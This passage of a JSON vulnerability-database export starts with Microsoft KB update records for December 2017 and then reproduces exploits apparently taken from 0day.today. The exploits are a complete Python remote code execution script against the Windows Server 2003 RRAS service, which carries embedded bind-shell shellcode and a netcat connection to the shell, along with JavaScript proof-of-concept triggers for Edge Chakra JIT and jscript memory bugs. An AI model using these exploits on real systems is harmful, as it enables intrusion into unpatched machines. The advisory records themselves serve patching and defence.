"cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4052978", "href": "https://support.microsoft.com/en-us/help/4052978", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:35", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updates Internet Explorer\u2019s default visibility for the button that launches Microsoft Edge.\n * Addresses issue where Windows Defender Device Guard and Application Control block some applications from running, even in Audit-Only Enforcement Mode.\n * Addresses issue to reset PLC bit on U0/U3 transitions.\n * Addresses issue with personalized Bluetooth devices that don't support bonding.\n * Addresses issue where the touch keyboard doesn\u2019t support the standard layout for 88 languages.\n * Addresses issue where the touch keyboard for a third-party Input Method Editor (IME) has no IME ON/OFF key.\n * Addresses additional issues with updated time zone information.\n * Addresses issue where, when using System Center Virtual Machine Manager (VMM), the user can't copy or clone virtual machines (VM). The error message is \"0x80070057- Invalid parameter\". This issue affects the VMM UI and PowerShell scripts used for VM cloning and copying.\n * Addresses issue where the Internet Connection Sharing (ICS) service does not persist connections across OS reboots or ICS service restarts. The solution can be activated through an optional \u201cEnableRebootPersistConnection\u201d registry key described in KB4055559.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nUpdate installation may stop at 99% and may show elevated CPU or disk utilization if a device was reset using the **Reset this PC** functionality after installing KB4054022.| This issue is resolved in KB4058702.**Note_ _**If you are impacted by this issue, you must restart your PC or end the existing Trusted Installer processes by running the following from an Administrative command prompt:taskkill /f /im tiworker.exetaskkill /f /im trustedinstaller.exeDevices that were impacted by this issue may have large CBS.log files. These files can be deleted by running the following from an Administrative command prompt:del /f %windir%\\logs\\cbs\\\\*.log \nWindows Update History reports that KB4054517 failed to install because of Error 0x80070643.| This issue is resolved in KB4058258. \nAfter installing this update, some preinstalled apps running Windows 10 version 1709 may be deleted at system restart.| This issue is resolved in KB4056892.Uninstalled apps can be reinstalled manually from the Microsoft Store. \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054517>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4054517](<http://download.microsoft.com/download/2/A/8/2A8F695C-424C-4E7D-8A04-D5952A77753B/4054517.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054517 (OS Build 16299.125)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054517", "href": "https://support.microsoft.com/en-us/help/4054517", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:02", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4051034 (released November 27, 2017) and addresses the following issues:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054518>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054518](<http://download.microsoft.com/download/2/8/5/285E8722-C448-4437-9584-FDBF8A5E388A/4054518.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054518 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054518", "href": "https://support.microsoft.com/en-us/help/4054518", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:30", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updates Internet Explorer\u2019s default visibility for the button that launches Microsoft Edge.\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses issue that caused Windows Pro devices on the Current Branch for Business (CBB) to upgrade unexpectedly.\n * Addresses issue where applications may stop responding for customers who have internet or web proxies enabled using PAC script configurations. This is a result of a reentrancy deadlock in WinHTTP.dll. This can result in the following:\n * Microsoft Outlook can't connect to Microsoft Office365.\n * Internet Explorer and Microsoft Edge can't render any content (including local computer content, local network content, or web content).\n * Cisco Jabber stops responding, which blocks messaging and telephony features.\n * Any application or service that relies on WinHTTP is affected.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053580>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053580](<http://download.microsoft.com/download/F/6/8/F68D177A-C312-4895-AD9C-6DB924869604/4053580.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053580 (OS Build 15063.786)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053580", "href": "https://support.microsoft.com/en-us/help/4053580", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:04", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4050945(released November 27, 2017) and addresses the following issues:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054520>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054520](<http://download.microsoft.com/download/3/5/B/35B4D68F-E9C9-47FF-B279-1F3BC449B5D4/4054520.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054520 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T08:00:00", "id": "KB4054520", "href": "https://support.microsoft.com/en-us/help/4054520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-14T02:41:57", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-05-13T00:00:00", "type": "zdt", "title": "Microsoft Windows 2003 SP2 - RRAS SMB Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2018-05-13T00:00:00", "id": "1337DAY-ID-30343", "href": "https://0day.today/exploit/description/30343", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.\r\n \r\n#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.\r\n#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.\r\n#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using \r\n#Windows Server 2003.\r\n \r\n#Exploit created by: V\u00edctor Portal\r\n#For learning purpose only\r\n \r\nimport struct\r\nimport sys\r\nimport time\r\nimport os\r\n \r\nfrom threading import Thread \r\n \r\nfrom impacket import smb\r\nfrom impacket import uuid\r\nfrom impacket import dcerpc\r\nfrom impacket.dcerpc.v5 import transport\r\n \r\ntarget = sys.argv[1]\r\n \r\nprint '[-]Initiating connection'\r\ntrans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % target)\r\ntrans.connect()\r\n \r\nprint '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % target\r\ndce = trans.DCERPC_class(trans)\r\n \r\n#RRAS DCE-RPC endpoint\r\ndce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))\r\n \r\n#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b \"\\x00\" -f python\r\nbuf = \"\"\r\nbuf += \"\\xb8\\x3c\\xb1\\x1e\\x1d\\xd9\\xc8\\xd9\\x74\\x24\\xf4\\x5a\\x33\"\r\nbuf += \"\\xc9\\xb1\\x53\\x83\\xc2\\x04\\x31\\x42\\x0e\\x03\\x7e\\xbf\\xfc\"\r\nbuf += \"\\xe8\\x82\\x57\\x82\\x13\\x7a\\xa8\\xe3\\x9a\\x9f\\x99\\x23\\xf8\"\r\nbuf += \"\\xd4\\x8a\\x93\\x8a\\xb8\\x26\\x5f\\xde\\x28\\xbc\\x2d\\xf7\\x5f\"\r\nbuf += \"\\x75\\x9b\\x21\\x6e\\x86\\xb0\\x12\\xf1\\x04\\xcb\\x46\\xd1\\x35\"\r\nbuf += \"\\x04\\x9b\\x10\\x71\\x79\\x56\\x40\\x2a\\xf5\\xc5\\x74\\x5f\\x43\"\r\nbuf += \"\\xd6\\xff\\x13\\x45\\x5e\\x1c\\xe3\\x64\\x4f\\xb3\\x7f\\x3f\\x4f\"\r\nbuf += \"\\x32\\x53\\x4b\\xc6\\x2c\\xb0\\x76\\x90\\xc7\\x02\\x0c\\x23\\x01\"\r\nbuf += \"\\x5b\\xed\\x88\\x6c\\x53\\x1c\\xd0\\xa9\\x54\\xff\\xa7\\xc3\\xa6\"\r\nbuf += \"\\x82\\xbf\\x10\\xd4\\x58\\x35\\x82\\x7e\\x2a\\xed\\x6e\\x7e\\xff\"\r\nbuf += \"\\x68\\xe5\\x8c\\xb4\\xff\\xa1\\x90\\x4b\\xd3\\xda\\xad\\xc0\\xd2\"\r\nbuf += \"\\x0c\\x24\\x92\\xf0\\x88\\x6c\\x40\\x98\\x89\\xc8\\x27\\xa5\\xc9\"\r\nbuf += \"\\xb2\\x98\\x03\\x82\\x5f\\xcc\\x39\\xc9\\x37\\x21\\x70\\xf1\\xc7\"\r\nbuf += \"\\x2d\\x03\\x82\\xf5\\xf2\\xbf\\x0c\\xb6\\x7b\\x66\\xcb\\xb9\\x51\"\r\nbuf += \"\\xde\\x43\\x44\\x5a\\x1f\\x4a\\x83\\x0e\\x4f\\xe4\\x22\\x2f\\x04\"\r\nbuf += \"\\xf4\\xcb\\xfa\\xb1\\xfc\\x6a\\x55\\xa4\\x01\\xcc\\x05\\x68\\xa9\"\r\nbuf += \"\\xa5\\x4f\\x67\\x96\\xd6\\x6f\\xad\\xbf\\x7f\\x92\\x4e\\xae\\x23\"\r\nbuf += \"\\x1b\\xa8\\xba\\xcb\\x4d\\x62\\x52\\x2e\\xaa\\xbb\\xc5\\x51\\x98\"\r\nbuf += \"\\x93\\x61\\x19\\xca\\x24\\x8e\\x9a\\xd8\\x02\\x18\\x11\\x0f\\x97\"\r\nbuf += \"\\x39\\x26\\x1a\\xbf\\x2e\\xb1\\xd0\\x2e\\x1d\\x23\\xe4\\x7a\\xf5\"\r\nbuf += \"\\xc0\\x77\\xe1\\x05\\x8e\\x6b\\xbe\\x52\\xc7\\x5a\\xb7\\x36\\xf5\"\r\nbuf += \"\\xc5\\x61\\x24\\x04\\x93\\x4a\\xec\\xd3\\x60\\x54\\xed\\x96\\xdd\"\r\nbuf += \"\\x72\\xfd\\x6e\\xdd\\x3e\\xa9\\x3e\\x88\\xe8\\x07\\xf9\\x62\\x5b\"\r\nbuf += \"\\xf1\\x53\\xd8\\x35\\x95\\x22\\x12\\x86\\xe3\\x2a\\x7f\\x70\\x0b\"\r\nbuf += \"\\x9a\\xd6\\xc5\\x34\\x13\\xbf\\xc1\\x4d\\x49\\x5f\\x2d\\x84\\xc9\"\r\nbuf += \"\\x6f\\x64\\x84\\x78\\xf8\\x21\\x5d\\x39\\x65\\xd2\\x88\\x7e\\x90\"\r\nbuf += \"\\x51\\x38\\xff\\x67\\x49\\x49\\xfa\\x2c\\xcd\\xa2\\x76\\x3c\\xb8\"\r\nbuf += \"\\xc4\\x25\\x3d\\xe9\"\r\n \r\n#NDR format\r\nstub = \"\\x21\\x00\\x00\\x00\" #dwPid = PID_IP (IPv4)\r\nstub += \"\\x10\\x27\\x00\\x00\" #dwRoutingPID\r\nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibInEntrySize \r\nstub += \"\\x41\"*4 #_MIB_OPAQUE_QUERY pointer\r\nstub += \"\\x04\\x00\\x00\\x00\" #dwVarID (_MIB_OPAQUE_QUERY)\r\nstub += \"\\x41\"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)\r\nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibOutEntrySize \r\nstub += \"\\xad\\x0b\\x2d\\x06\" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)\r\nstub += \"\\xd0\\xba\\x61\\x41\\x41\" + \"\\x90\"*5 + buf + \"\\x41\"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)\r\nstub += \"\\x04\\x00\\x00\\x00\" #dwId (_MIB_OPAQUE_INFO)\r\nstub += \"\\x41\"*4 #ullAlign (_MIB_OPAQUE_INFO)\r\n \r\n \r\ndce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected)\r\nprint \"[-]Exploit sent to target successfully...\"\r\n \r\nprint \"Waiting for shell...\"\r\ntime.sleep(5)\r\nos.system(\"nc \" + target + \" 4444\")\n\n# 0day.today [2018-05-14] #", "sourceHref": "https://0day.today/exploit/30343", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-01T19:35:09", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29410", "href": "https://0day.today/exploit/description/29410", "sourceData": "/*\r\nEscape analysis: https://en.wikipedia.org/wiki/Escape_analysis\r\n \r\nChakra fails to detect if \"tmp\" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt() {\r\n let tmp = [];\r\n tmp[0] = tmp;\r\n return tmp[0];\r\n}\r\n \r\nfunction main() {\r\n for (let i = 0; i < 0x1000; i++) {\r\n opt();\r\n }\r\n \r\n print(opt()); // deref uninitialized stack pointers!\r\n}\r\n \r\nmain();\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29410", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T05:16:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined Jav", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29407", "href": "https://0day.today/exploit/description/29407", "sourceData": "/*\r\n1. Call patterns like \"Math.max.apply(Math, [1, 2, 3, 4, 5])\" and \"Math.max.apply(Math, arr)\" can be optimized to directly call the method \"JavascriptMath::MaxInAnArray\" in the Inline Phase.\r\n2. The method takes the original method \"Math.max\" as the first parameter and the arguments object as the second parameter.\r\n3. If the arguments object can't be handled by the method, it explicitly calls the original method \"Math.max\".\r\n4. But it doesn't check if the property \"Math.max\" has changed, so a user defined JavaScript function can be called without updating \"ImplicitCallFlags\".\r\n \r\nNote: Math.min as well.\r\n \r\nPoC:\r\n*/\r\n \r\nfunction opt(arr, arr2) {\r\n arr[0] = 1.1;\r\n Math.max.apply(Math, arr2);\r\n arr[0] = 2.3023e-320;\r\n}\r\n \r\nfunction main() {\r\n let arr = [1.1, 2.2, 3.3, 4.4];\r\n for (let i = 0; i < 10000; i++) {\r\n opt(arr, [1, 2, 3, 4]);\r\n }\r\n \r\n Math.max = function () {\r\n arr[0] = {};\r\n };\r\n \r\n opt(arr, {}); // can't handle, calls Math.max\r\n print(arr[0]);\r\n}\r\n \r\nmain();\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29407", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-14T15:44:00", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29262", "href": "https://0day.today/exploit/description/29262", "sourceData": "Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen \r\n\r\nCVE-2017-11906\r\n\r\n\r\nThere is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):\r\n\r\nPoC for IE (note: page heap might be required to obsorve the crash):\r\n\r\n=========================================\r\n\r\n\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n\r\nfunction go() {\r\n var r= new RegExp(Array(100).join('()'));\r\n ''.search(r);\r\n alert(RegExp.lastParen);\r\n}\r\n\r\ngo();\r\n\r\n</script>\r\n\r\n=========================================\r\n\r\nDebug log:\r\n\r\n=========================================\r\n\r\n(cec.a14): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!RegExpFncObj::LastParen+0x43:\r\n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????\r\n\r\n0:014> r\r\nrax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063\r\nrdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0\r\nrip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148\r\n <a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=00000000130f9210 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=0000000000000000 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=000000000463fef0\r\n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=000000000463ff38 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000000000083 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=0000000000000000\r\n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=00000000130f9210 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">r15</a>=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\njscript!RegExpFncObj::LastParen+0x43:\r\n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????\r\n\r\n0:014> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43\r\n01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5\r\n02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873\r\n03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373\r\n04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3\r\n06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6\r\n08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7\r\n0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e\r\n0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56\r\n0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283\r\n12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235\r\n14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90\r\n15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb\r\n16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f\r\n17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70\r\n18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1\r\n19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150\r\n1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5\r\n1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd\r\n24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n=========================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29262", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-20T05:28:34", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2018-01-09T00:00:00", "id": "1337DAY-ID-29408", "href": "https://0day.today/exploit/description/29408", 